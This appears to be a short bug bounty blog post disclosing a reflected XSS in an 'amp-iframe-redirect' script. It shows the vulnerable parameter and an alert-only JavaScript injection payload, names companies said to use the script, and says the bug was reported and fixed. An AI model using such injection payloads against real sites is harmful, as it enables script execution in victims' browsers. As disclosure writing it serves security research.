My First 0day Exploit (Reflected XSS) #BUGBOUNTY

Hi guys!

Steps:

1. When I went to https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0 , saw this code block:

2. Then I thought about which characters I could use. So, I went to: https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=”’<>/();

Then I saw I could not use </script><img src=v onerror=alert(1)> for get xss. I thought I will not bypass it, but maybe I can add javascript. So, I can get xss. After researching javascript for a while, I created the required block of code:

); alert(document.domain); if (1

When I go to https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=); alert(document.domain); if (1 , I saw the xss alert ;)

Some popular companies are using this script. Example;

• Shopify
• Canva
• Yelp
• Western Union
• Cuvva etc

And reported developer’s bug bounty program. Then, this’s fixed.

If you want to get more notifications about my works, that’s my Twitter account.

https://twitter.com/alicanact60